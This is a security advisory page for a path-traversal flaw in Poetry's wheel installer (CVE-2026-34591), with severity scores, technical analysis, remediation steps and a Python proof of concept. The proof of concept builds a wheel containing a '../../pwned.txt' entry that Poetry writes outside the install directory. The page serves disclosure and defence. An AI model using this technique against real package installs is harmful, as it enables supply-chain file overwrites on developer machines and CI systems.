Red Hat CVE-2026-34591
HIGHSeverity by source
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N
Primary rating from GitHub Advisory.
CVSS VectorGitHub Advisory
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Lifecycle Timeline
3Blast Radius
ecosystem impact- 1 pypi packages depend on poetry (1 direct, 0 indirect)
Ecosystem-wide dependent count for version 1.4.0.
DescriptionGitHub Advisory
Summary
A crafted wheel can contain ../ paths that Poetry writes to disk without containment checks, allowing arbitrary file write with the privileges of the Poetry process.
Impact
Arbitrary file write (path traversal) from untrusted wheel content. Impacts users/CI/CD systems installing malicious or compromised packages.
Patches
Versions 2.3.3 and newer of Poetry resolve the target paths and ensure that they are inside the target directory. Otherwise, installation is aborted.
Details
Poetry’s wheel destination path is built by directly joining an untrusted wheel entry path:
src/poetry/installation/wheel_installer.py:47 src/poetry/installation/wheel_installer.py:59
The vulnerable sink is reachable in normal installation: src/poetry/installation/executor.py:607
No resolve() + is_relative_to() style guard is enforced before writing.
POC
from pathlib import Path
import tempfile, zipfile, sys
from installer import install
from installer.sources import WheelFile
from poetry.installation.wheel_installer import WheelDestination
root = Path(tempfile.mkdtemp(prefix="poetry-poc-"))
wheel = root / "evil-0.1-py3-none-any.whl"
base = root / "venv" / "lib" / "pythonX" / "site-packages"
for d in [base, root/"venv/scripts", root/"venv/headers", root/"venv/data"]:
d.mkdir(parents=True, exist_ok=True)
files = {
"evil/__init__.py": b"",
"../../pwned.txt": b"owned\n",
"evil-0.1.dist-info/WHEEL": b"Wheel-Version: 1.0\nRoot-Is-Purelib: true\nTag: py3-none-any\n",
"evil-0.1.dist-info/METADATA": b"Metadata-Version: 2.1\nName: evil\nVersion: 0.1\n",
}
files["evil-0.1.dist-info/RECORD"] = ("\n".join([f"{k},," for k in files] + ["evil-0.1.dist-info/RECORD,,"])+"\n").encode()
with zipfile.ZipFile(wheel, "w") as z:
for k,v in files.items(): z.writestr(k,v)
dest = WheelDestination(
{"purelib":str(base),"platlib":str(base),"scripts":str(root/"venv/scripts"),"headers":str(root/"venv/headers"),"data":str(root/"venv/data")},
interpreter=sys.executable, script_kind="posix"
)
with WheelFile.open(wheel) as src:
install(src, dest, {"INSTALLER": b"PoC"})
out = (base / "../../pwned.txt").resolve()
print("outside write:", out.exists(), out)AnalysisAI
Path traversal in Poetry's wheel installer (versions prior to 2.3.3) allows malicious Python packages to write arbitrary files outside the installation directory during package installation. Attackers can craft wheel files containing ../ directory traversal sequences that bypass containment checks, enabling file overwrite with Poetry process privileges. This directly threatens CI/CD pipelines and developer workstations installing untrusted packages from PyPI or private repositories. No active exploitation confirmed at time of analysis, but a functional proof-of-concept is publicly documented in the GitHub advisory.
Technical ContextAI
Poetry is a Python dependency management and packaging tool (pkg:pip/poetry) that installs packages from wheel files (.whl archives). The vulnerability stems from CWE-22 (Path Traversal) in the WheelDestination class within wheel_installer.py. When extracting wheel contents, Poetry directly joins untrusted file paths from the wheel's archive entries to the target installation directory without validating that the resulting path stays within intended boundaries. Specifically, lines 47 and 59 in wheel_installer.py construct destination paths by string concatenation rather than using path resolution and containment checks (resolve() + is_relative_to()). An attacker can include entries like ../../pwned.txt in a wheel's file list, causing Poetry to write files to parent directories or arbitrary filesystem locations. The vulnerable code path is triggered during normal package installation operations invoked through executor.py line 607, meaning any poetry install or poetry add command processing a malicious wheel is affected.
RemediationAI
Upgrade to Poetry version 2.3.3 or later immediately, which implements path resolution and containment validation to prevent directory traversal during wheel installation. Users can verify their Poetry version with poetry --version and upgrade via pip install --upgrade poetry or pipx upgrade poetry depending on installation method. For environments where immediate upgrades are impractical, implement strict package source controls: pin dependencies to known-good hashes using poetry lock, enable hash-checking in pyproject.toml, and restrict package installation to vetted internal repositories rather than public PyPI. Review the vendor advisory at https://github.com/python-poetry/poetry/security/advisories/GHSA-2599-h6xx-hpxp for additional context. Organizations should audit file integrity in environments where Poetry has installed packages since deployment, particularly in shared CI/CD runners or production systems, as malicious wheels could have written backdoors or exfiltrated credentials to attacker-controlled paths.
Same weakness CWE-22 – Path Traversal
View allSame technique Path Traversal
View allVendor StatusVendor
SUSE
Severity: Medium| Product | Status |
|---|---|
| openSUSE Leap 15.6 | Fixed |
Share
External POC / Exploit Code
Leaving vuln.today
GHSA-2599-h6xx-hpxp